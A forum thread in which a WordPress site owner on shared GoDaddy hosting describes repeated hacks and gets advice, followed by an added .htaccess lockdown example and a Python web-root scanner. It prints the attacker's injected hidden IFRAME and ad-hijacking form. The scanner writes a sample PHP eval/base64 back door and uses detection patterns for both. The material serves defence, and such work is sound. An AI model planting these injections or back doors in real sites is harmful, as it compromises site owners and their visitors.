Website Security – Steps to Take After Being Hacked

Tags: ftp, godaddy, hacking, hosting, password

Final Update:

Things have been peaceful for the past few weeks, and this has taught me much more about website security and risks. Here's my version of the story –

I was using an older version of WordPress and probably this person caught me from Google. I think it was a script attack. It's difficult to say how and when the security was actually compromised; it came to my notice on Nov 5, 2009. While I took some safety measures at that time (described below), there's always a possibility that I missed re-changing the WordPress passwords when I formatted my work computer.

Now I've deleted all unrequired PHP scripts from the hosting, made the administration part accessible only to my IP, and blocked a particular IP range that belongs to Vietnam. Daily backups and other stuff. The thing is that there are so many variables involved and it's too difficult to keep track of each and every thing. The main lesson is: be prepared for it. 🙂


I'm on a shared hosting plan by GoDaddy and run a WordPress website. My website was hacked for the first time on Nov 5, 2009. At that time, the hacker replaced my ads with his own. I thought it happened because of my laziness with security, but I was so wrong.

I formatted my computer and set up everything again. Replaced ESET NOD32 with Microsoft Security Essentials. Upgraded to the latest version of WordPress. Changed all passwords. Set up a new database. And other security-related stuff I read here and there. Things worked well for a while until my site was hacked again today.

Last time, the guy played with a lot of files and specifically changed footer.php and all ads-related files. But this time he just went to the right place and replaced it with the following code –

<IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME>

<form action="http://www.google.com/cse" id="cse-search-box">
  <div>
    <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" />

    <input type="hidden" name="ie" value="ISO-8859-1" />
    <input type="text" name="q" size="31" />
    <input type="submit" name="sa" value="Search" />
  </div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>

Looks like that person isn't interested in manipulating the database etc. but just places code and makes quick money. GoDaddy forwarded my FTP logs and there was an unauthorized access from IP – 117.2.56.31. This IP belongs to Vietnam, and http://blackberryrss.com also has some connection to Vietnam.

There is no SSH access to my account and I connect to FTP using FireFTP. This was GoDaddy's response last time –

Upon reviewing your account we have found your FTP account has been compromised either due to malware on your local computer or a weak FTP/Hosting password.

But I had changed all passwords, deleted accounts, etc., and nothing seems to work. I'm clueless at the moment. Please tell me what to do. How can I prevent unauthorized access to my account?

Additional Details:

  • The strength of the password is just Strong, not Best.
  • I personally use Windows XP SP3, Windows Firewall, etc. After the first attack I've learned to work using a user account and avoid the administrator account.
  • When I look at the FTP logs for the first attack, it's quite clear that the person is doing all of this manually.
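The "administration part accessible only to my IP" measure from the Final Update, written out as an added example in Apache 2.2-style .htaccess syntax (the syntax shared hosts of that era used). This is constructed illustration, not the poster's actual configuration: 203.0.113.10 stands in for the owner's own static IP and 198.51.100.0/24 for the range the FTP logs pointed at; both are documentation-range placeholders to be replaced.

```apache
# --- wp-admin/.htaccess ---
# Constructed example: only the address 203.0.113.10 (placeholder for your
# own static IP) may reach anything under /wp-admin/.
Order deny,allow
Deny from all
Allow from 203.0.113.10

# admin-ajax.php is called by the public side of many themes and plugins,
# so it stays reachable; everything else in the directory remains closed.
<Files admin-ajax.php>
    Order allow,deny
    Allow from all
</Files>

# --- .htaccess in the web root ---
# wp-login.php lives outside wp-admin/, so the directory rule above does not
# cover it; restrict the login page to the same address.
<Files wp-login.php>
    Order deny,allow
    Deny from all
    Allow from 203.0.113.10
</Files>

# Block the range seen in the FTP logs (198.51.100.0/24 is a placeholder CIDR;
# substitute the real one).
Order allow,deny
Allow from all
Deny from 198.51.100.0/24
```

Two caveats a practitioner would keep in mind: these rules only limit what the web server will serve, so they do nothing against the FTP-based file changes described in this post (that needs a unique FTP password and, ideally, SFTP/FTPS where the host offers it); and if the owner's connection uses a dynamic IP, the Allow line will lock them out too until it is updated. On Apache 2.4 the same intent is written with Require ip / Require all denied instead of Order/Allow/Deny.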

Best Answer

Keep in mind FTP sends your password in CLEAR TEXT. So the potential for compromise is definitely there.

Another thing to consider, is your FTP password UNIQUE to your hosting? Are you sure you're not using it ANYWHERE else? No other accounts, websites, etc?

How secure is your EMAIL password? I've been involved in cases where the "weak link" was actually the EMAIL password and the culprit was just sending "forgot passwords" to the email and deleting the evidence from the email box while everyone was too busy focusing on the compromised server to notice.

Just a few things that came to mind... some other things of course would be a social engineering approach with your ISP or some software vulnerability on your server or one of the packages you're hosting.

There's more (obviously) but those are typically the "usual suspects".


UPDATE:

Based on this new information (that the hacker is not using FTP to change your files) I can only assume that the most likely cause is probably an unsecured web app.

That's not the ONLY thing it can be, but in cases like this it is the most likely.

Another thing to consider (and check for) is if he left himself some sort of "back door" to your app. I seem to recall you mentioning before that your ISP said he came in via FTP. Is it possible he came in via FTP the first time and left himself a back door?

Also, it's a shot in the dark, but I have personally witnessed compromised boxes where a hacker only came in ONE time but left a cron job that kept changing files and other various evil. Is it possible that the hacker DIDN'T come back and you're dealing with an automated script? Just something to check if you feel you've exhausted all other possibilities.

Finally, do you have access to your web logs, system logs, etc? If so, what do they say? Do they reveal any clues?
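The answer's advice to look for a left-behind back door, and the injection shown in the question (a 1x1 IFRAME dropped into a theme file), both come down to the same check: pull a copy of the web root over FTP and look for files that contain injection markers or that changed after the last known-clean deploy. The Python script below is an added example, not code from the original post; it builds a small constructed sample web root in a temporary directory (one clean file, one file carrying the page's style of hidden IFRAME with a placeholder host, and one eval/base64 script of the kind PHP back doors commonly use) and scans it. The regexes are a constructed starting set of indicators, not a complete signature list.

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Constructed indicator set. "hidden-iframe" matches an iframe whose width or
# height is 0 or 1 (the shape of the injection in the question); the other two
# match constructs that PHP back doors typically rely on.
INJECTION_PATTERNS = {
    "hidden-iframe": re.compile(
        r"<iframe[^>]*\b(?:height|width)\s*=\s*[\"']?[01][\"']?(?![0-9])",
        re.IGNORECASE),
    "eval-base64": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(",
        re.IGNORECASE),
    "preg-replace-e": re.compile(r"preg_replace\s*\([^,]*/e[\"']", re.IGNORECASE),
}


def scan_webroot(root, modified_since=None,
                 extensions=(".php", ".html", ".htm", ".js")):
    """Return sorted (relative_path, reason) tuples for every file under
    `root` that matches an indicator or was modified after `modified_since`
    (a Unix timestamp, e.g. the time of the last clean deploy)."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in extensions:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        rel = path.relative_to(root).as_posix()
        for name, pattern in INJECTION_PATTERNS.items():
            if pattern.search(text):
                findings.append((rel, name))
        if modified_since is not None and path.stat().st_mtime > modified_since:
            findings.append((rel, "modified-since-baseline"))
    return sorted(findings)


def build_sample_site(root):
    """Create a constructed sample web root: one clean file, one theme file
    with an injected hidden IFRAME, and one back-door-style script."""
    root = Path(root)
    (root / "wp-content").mkdir(parents=True, exist_ok=True)
    (root / "index.php").write_text("<?php require 'wp-blog-header.php';\n")
    (root / "footer.php").write_text(
        '</div>\n<IFRAME height=1 src="http://attacker.invalid/check.html" '
        'frameBorder=0 width=1></IFRAME>\n')  # placeholder host, constructed
    (root / "wp-content" / "cache.php").write_text(
        '<?php eval(base64_decode($_POST["c"])); ?>\n')
    # Age the clean file so the mtime check flags only the other two.
    old = time.time() - 30 * 86400
    os.utime(root / "index.php", (old, old))
    return root


def demo():
    """Scan the constructed site with a baseline of one week ago."""
    with tempfile.TemporaryDirectory() as tmp:
        site = build_sample_site(tmp)
        baseline = time.time() - 7 * 86400
        return scan_webroot(site, modified_since=baseline)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:24} {rel}")
```

On a real site the mtime check is the more reliable half: a pattern list only catches what it was written for, whereas a file changed after the last deploy, or a file that exists on the server but not in the clean WordPress/theme copy, has to be explained regardless of its contents. Comparing the FTP copy against a fresh WordPress archive of the same version is the natural next step.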
